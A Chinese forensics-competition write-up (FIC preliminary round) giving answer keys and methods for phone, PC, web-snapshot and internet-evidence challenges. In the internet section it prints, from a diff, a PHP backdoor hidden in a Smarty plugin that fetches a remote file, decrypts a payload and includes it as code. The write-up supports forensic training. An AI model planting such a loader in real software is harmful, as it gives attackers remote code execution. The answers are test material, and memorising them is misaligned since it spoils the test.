容器密码：3x@9Qm!V8e$vL%6d^Yr5o*C#Nk7h&ZpFbW2sG4jXuD1cO0lTgAqHwRnIzJyM-_+K=

第一部分网页快照

1. 请分析检材一，该取证录像文件的 SHA256 值为

2753da22fe23cadaadc14fe4c1d5096a153360d9f91097ea376846431f5c1567

2. 请分析检材一，远程取证所使用的 OBS 工具版本号为

参考答案：2.29.1.3

3. 请分析检材一，该检材所使用的远程取证的工具名称为

参考答案：A

4. 请分析检材一，在该检材中，远程取证过程中校验的北京时间为

参考答案：D

5. 请分析检材一，远程取证的网站 IP 地址为

参考答案：172.16.10.200

6. 请分析检材一，在该检材中，远程取证的网站密码为

参考答案：admin123

7. 请分析检材一，在已固定的“订单列表”中发现有一页缺失。请找出缺失页面的具体页码为

参考答案：12

输入所有页码去重排序，发现是12页

8. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计订单的总数为

参考答案：4000

9. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的订单数为

建表求和后为238

10. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的ZK-101产品的订单数为

建表求和得67

11. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”产品在上海区域的订单数为

参考答案：12。统计后excel求和

12. 请分析检材一，补充“订单列表”中缺失页面的数据后，统计已完成订单中“老李监控批发”的销售情况，并计算“赵磊（13967346658）”优惠后的总金额为（例如，优惠率为10%时按原单价的90%计算）

参考答案：4390。统计不同页码的订单单价及折扣求和。

13. 请分析检材一，补充“代理列表”中缺失页面的数据后，统计代理人的最大层级数为（其中顶级代理的用户定义为第1层）

参考答案：6

层级分析题，跑代码（万能代码）

import pandas as pddef build_supervisor_dict(df):    supervisor_dict = {}    for index, row in df.iterrows():        name = row['姓名']        supervisor = row['上级']        if name not in supervisor_dict:            supervisor_dict[name] = supervisor    return supervisor_dictdef find_all_supervisors(name, supervisor_dict):    supervisors = [name]    while name in supervisor_dict:        name = supervisor_dict[name]        supervisors.insert(0, name)    return supervisorsdf = pd.read_excel('data.xlsx', sheet_name='hz_user', dtype=str)supervisor_dict = build_supervisor_dict(df)result_data = []for name in df['姓名']:    supervisors = find_all_supervisors(name, supervisor_dict)    result_data.append([name] + supervisors)max_length = max(len(row) for row in result_data)result_data = [row + [''] * (max_length - len(row)) for row in result_data]result_df = pd.DataFrame(result_data, columns=['姓名'] + [f'分级{i}' for i in range(1, max_length)])result_df.to_excel('result.xlsx', index=False)

14. 请分析检材一，补充“代理列表”中缺失页面的数据后，统计每位代理的直接下游人数，并确定直接下游人数排名第一的代理人为

参考答案：杨伟娜

15. 请分析检材一，补充“代理列表”中缺失页面的数据后，根据地址信息统计各区域的代理人数，并确定上海区域的代理人数为

参考答案：5。赵磊、朱洋、周强、黄伟娟、刘平伟。

第二部分手机取证

1. 请分析检材二，请分析"手机"检材，并回答，并回答该手机的device_name是？

参考答案：Redmi 6 Pro

先通过AI确定大致存储位置为“system”分区中，然后逐个扫描，放到百度搜索就可以了（考试时候填的红米6Pro可惜了）

2. 请分析检材二，请分析"手机"检材，并回答，嫌疑人pc开机密码是什么？

参考答案：1qaz2wsx

通过软件解析发现便签中记录电脑开机密码为1列2列，所以有意识的去看便签数据库，找到目标内容并且拿1列2列密码是碰一下计算机检材就可以了

3. 请分析检材二，请分析"手机"检材，并回答，嫌疑人接头暗号是什么？

参考答案：爱能不能够永远单纯没有悲哀

将tar包按照大小排序，发现可以包名“com.bijoysingh.yang”，分析数据库定位到目标附件，然后全局搜索一下即可

4. 请分析检材二，请分析"手机"检材，并回答，嫌疑人存放的秘钥环是多少？

参考答案：1qaz2wsx3edc

5. 请分析检材二，请分析"手机"检材，并回答，嫌疑人一生中最重要的日子是什么时候？

参考答案：2026-02-26（考试卡了好久，最后全局搜索找到图片）

6. 请分析检材三，请分析"手机"检材，并回答，嫌疑人微信生成的聊天记录数据库文件名称是什么？

参考答案：EnMicroMsg.db

这个没啥解释了，之前有写过文章大家想看安卓微信数据库解密爬楼就可以了

7. 请分析检材二，请分析"手机"检材，并回答，嫌疑人微信账号对应的 UIN 为多少？

参考答案：1864810197

不解析啦，大家看之前公众号吧

8. 请分析检材二，请分析"手机"检材，并回答，嫌疑人微信聊天记录数据库的加密秘钥是什么？

参考答案：290f678

不解析啦，大家看之前公众号吧

9. 请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”的解压密码是多少？

参考答案：3170010703

把微信聊天发的图片导出来调整曝光找到二维码扫码得到密码

10. 请分析检材二，请分析"手机"检材，并回答，嫌疑人“欠条.rar”解压后，其中VeraCrypt容器MD5值是多少？

参考答案：83da62aabc88cb1b23e9469142b67b80

11. 请分析检材二，请分析"手机"检材，并回答，嫌疑人提供的“欠条.rar”解压后，其中"1.png"图上显示的VeraCrypt容器密码是多少？

参考答案：#!@KE2sax@!da0h5hghg34&@

使用神器解隐写

12. 请分析检材二，请分析"手机"检材，并回答，嫌疑人李某全名是什么？

参考答案：李安弘

用VeraCrypt加载看欠条

13. 请分析检材二，请分析"手机"检材，并回答，嫌疑人欠款金额是多少？

参考答案：80000

同上题从欠条里找到

第三部分介质取证

1. 请分析检材三，请分析"电脑"检材，并回答，该电脑最后一次开机时间是？

参考答案：C、2025/4/14 11:49:47

2. 请分析检材三，请分析"电脑"检材，并回答，嫌疑人的备用机号码是多少？

参考答案：18877332134

仿真起来看便签

3. 请分析检材三，请分析"电脑"检材，并回答，域名dgy02.com曾保存过一个密码，该密码是多少？

参考答案：123456

这题考察的浏览器保存的密码相关知识，密码是跟开机密码关联的，所以仿真的时候不能去清除密码，要用原密码进入，首先找到密钥环

然后仿真直接输入密钥环在密码里面可以看到

4. 请分析检材三，请分析"电脑"检材，并回答，其电脑安装的微信版本是多少？

参考答案：4.0.0.21

5. 请分析检材三，请分析"电脑"检材，并回答，该系统有哪些远程控制软件

拿着答案去搜索

6. 请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，其记录的日志文件名为

参考答案：sunlogin_service.log.2

XWAY在/var/log下

直接根据日志里面的时间格式搜索

只有在sunlogin_service.log.2里面有

7. 请分析检材三，请分析"电脑"检材，并回答，电脑2025年4月10日11点4分29秒曾被向日葵远程控制，日志内记录对方公网IP地址和端口为

参考答案：116.192.161.222:2577

直接把日志文件丢AI分析

8. 请分析检材三，请分析"电脑"检材，并回答，某文件的MD5值为“2bdfcdbd6c63efc094ac154a28968b7d”，该文件名为

参考答案：important.docx

浏览+递归然后计算分区六的哈希，分区4的哈希也算过但是算完之后过滤没有所以又算了分区六的

MD5过滤出来

9. 请分析检材三，请分析"电脑"检材，据调查，上述文件存放了钱包助记词，第一个单词是什么？

参考答案：solution

根据题干知道这题答案在important.docx中，直接把这个文档当做压缩包解压，然后扫描文件隐写即可

10. 请分析检材三（“我的测试机”），最近曾访问过的音频文件，该音频文件的文件名是什么

参考答案：自传小说.mp3

11. 请分析检材三（“我的测试机”），最近曾使用过USB设备，该设备的名称为

参考答案：ThinkPLus

12. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人现任妻子毕业的大学是？

参考答案：北京大学

使用科大讯飞会员将音频转为文字内容，分析即可

13. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人是通过一个朋友认识的陈老板，该朋友姓氏拼音是？

参考答案：wang

14. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人所说的香格里拉大酒店实则是？

参考答案：棋牌室

15. 请分析检材三（“我的测试机”）中的音频内容，并回答，嫌疑人银行密码是多少？

参考答案：071492

考试没搞定，每段话的第一个字连起来，真6

第四部分互联网取证

1. 请分析检材二，找到李某上游人员陈某博客宣传所用域名为

参考答案：chen.foren6

2. 请分析陈某宣传所用域名，该域名的顶级域名在以下那个区块链注册

参考答案：B.HNS（https://handshake.org/）

3. 请分析陈某宣传所用域名的顶级域名的域名解析服务器（DNS）共有几个

参考答案：2

去https://www.namebase.io/网站搜索foren6

4. 请分析陈某宣传所用域名的顶级域名的NS1服务器ip为

参考答案：45.79.133.98

继续在namebase搜索varo

5. 请分析陈某宣传所用域名，该域名DNS记录指向邮件服务器域名为

参考答案：mail.163.com

已知ns1.varo.（实际为 ns1.varo.domains，IP：45.79.133.98）是 ** .foren6** 的权威服务器，

可以直接使用dig命令向其查询chen.foren6的DNS记录

dig @45.79.133.98 chen.foren6 ANY

图上可见邮件服务器域名为mail.163.com

6. 请分析陈某宣传所用域名，该域名的txt记录中chen的值为

参考答案：fengbaoliejiu

同上

7. 请分析陈某宣传所用域名，该域名DNS记录没有以下哪个域名

参考答案：D.hl.chen.foren6

题目给出的选项都没有出现在上述截图中，考虑这些子域名有独立的 DNS 记录（例如，admin.chen.foren6 有自己的 A 记录），由 chen.foren6 的 NS 服务器（ns1.varo.domains）管理。直接向NS1服务器查询子域名的记录

for sub in admin caidan fic hl; do

  dig @45.79.133.98 $sub.chen.foren6 ANY

done

root:~# for sub in admin caidan fic hl; do  dig @45.79.133.98 $sub.chen.foren6 ANYdone; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 admin.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 50076;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;admin.chen.foren6.        IN    ANY;; ANSWER SECTION:admin.chen.foren6.    20    IN    MX    0 114.51.41.91.;; Query time: 231 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE  rcvd: 74; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 caidan.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 33278;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;caidan.chen.foren6.        IN    ANY;; ANSWER SECTION:caidan.chen.foren6.    20    IN    A    20.25.4.26;; Query time: 235 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:24 UTC 2025;; MSG SIZE  rcvd: 63; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 fic.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12576;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;fic.chen.foren6.        IN    ANY;; ANSWER SECTION:fic.chen.foren6.    20    IN    AAAA    fb00:9a9a:7d01:ddca:6666:6666::;; Query time: 215 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE  rcvd: 72; <<>> DiG 9.18.30-0ubuntu0.22.04.2-Ubuntu <<>> @45.79.133.98 hl.chen.foren6 ANY; (1 server found);; global options: +cmd;; Got answer:;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34484;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1;; WARNING: recursion requested but not available;; OPT PSEUDOSECTION:; EDNS: version: 0, flags:; udp: 1232;; QUESTION SECTION:;hl.chen.foren6.            IN    ANY;; AUTHORITY SECTION:chen.foren6.        20    IN    SOA    ns1.varo. ops.varo.domains. 1 10800 3600 604800 3600;; Query time: 239 msec;; SERVER: 45.79.133.98#53(45.79.133.98) (TCP);; WHEN: Mon Apr 28 02:55:25 UTC 2025;; MSG SIZE  rcvd: 103

把结果拿去问AI，给出结论

• admin.chen.foren6
  
  ：有 MX 记录（114.51.41.91，可能配置错误）。
• caidan.chen.foren6
  
  ：有 A 记录（20.25.4.26，正常）。
• fic.chen.foren6
  
  ：有 AAAA 记录（fb00:9a9a:7d01:ddca:6666:6666::，可能是测试）。
• hl.chen.foren6
  
  ：无记录（NXDOMAIN）。

因此选D

8. 请分析陈某宣传所用域名，该博客域名最终DNS解析指向的github仓库名为

参考答案：chewhaoN.github.io

通过dig找不到相关信息。直接从github上入手，搜索chen.foren6，找到了github仓库名

9. 请分析陈某github账号，陈某对jkroepke/2Moons项目增改了几个文件

通过陈某github账号找到了2Moons项目，和jkroepke/2Moons原始项目分别下载下来进行对比

用vscode的插件Diff Folders对比两个文件夹，得到结果是192

但是实际查看这些文件发现似乎只有换行符的区别，使用diff命令查看

# diff -r --exclude=.git --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons 2Moons-ori只在 2Moons 存在：encrypted.bindiff -r '--exclude=.git' --strip-trailing-cr --ignore-space-change --ignore-blank-lines 2Moons/includes/libs/Smarty/plugins/block.textformat.php 2Moons-ori/includes/libs/Smarty/plugins/block.textformat.php36,37c36< <    function smarty_block_textformat($params, $content, $template, &$repeat)---> function smarty_block_textformat($params, $content, $template, &$repeat)113,114d111<     $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();< 

这么看只有2个文件不同，新增1个文件，修改1个文件。

10. 请分析陈某github账号，陈某在修改2Moons过程中提到了什么锅底

参考答案：蜂蜜锅底

查看被修改过的文件，发现新增了一个encrypted.bin文件，

在修改文件中找到一个php文件

查看该php文件找到后门

可以发现访问了一个链接

解码该url得到答案

11. 请分析陈某github账号，陈某在游戏2Moons中放置的后门连接码的密码为

根据后门内容，写出解密脚本，得到密码为ficnb

    $a=file_get_contents('https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css');$b=md5($a,true);$c=file_get_contents('../../../../encrypted.bin');$d=base64_decode($c);$e='aes-256-cbc';$f=openssl_cipher_iv_length($e);$g=substr($d,0,$f);$h=substr($d,$f);$i=openssl_decrypt($h,$e,$b,OPENSSL_RAW_DATA,$g);$j=sys_get_temp_dir();$k=$j.'/func_'.uniqid().'.php';file_put_contents($k,"<?phpn".$i);include $k;unlink($k);yijuhua();

访问css文件链接发现还存在，encrypted.bin文件也存在根目录下。让AI根据后门写一个解密脚本，解密encrypt文件内容。

wget --no-check-certificate https://foren6.atwebpages.com/woyao/eat/%E7%81%AB%E9%94%85/%E8%9C%82%E8%9C%9C%E9%94%85%E5%BA%95.css

12. 请访问陈某当前博客，陈某课程的扫码报名地址的域名为

参考答案：fic.forensix.cn

将陈某github上的源码下载下来，打开index.html，可以看到如下内容

进入images路径下打开image1.png并扫码

13. 请分析陈某当前博客，通过互联网找到陈某的旧博客网站标题为

参考答案：柳如烟大战霸天虎

分析当前博客的源码，从index.html中找到老博客的地址

http://forensix2025.work.gd/

该地址目前已经无法访问，尝试查看快照文件，从https://archive.org/中搜寻该地址

可以看到4.7和4.26均存在快照，但是4.26的快照为403

4.7的快照存在博客内容

可以看到博客网站标题为

14. 请分析陈某旧博客，陈某的姓名为

参考答案：陈浩北

15. 请分析陈某旧博客，陈某的邮箱地址为

参考答案：[email protected]

查看快照源码

16. 请分析陈某旧博客，陈某的11位手机号为

参考答案：13170010703

17. 请分析陈某旧博客，陈某最爱的dota英雄为

参考答案：D

老dotaer都懂的

原文始发于微信公众号（取证与溯源）：第五届FIC-初赛WP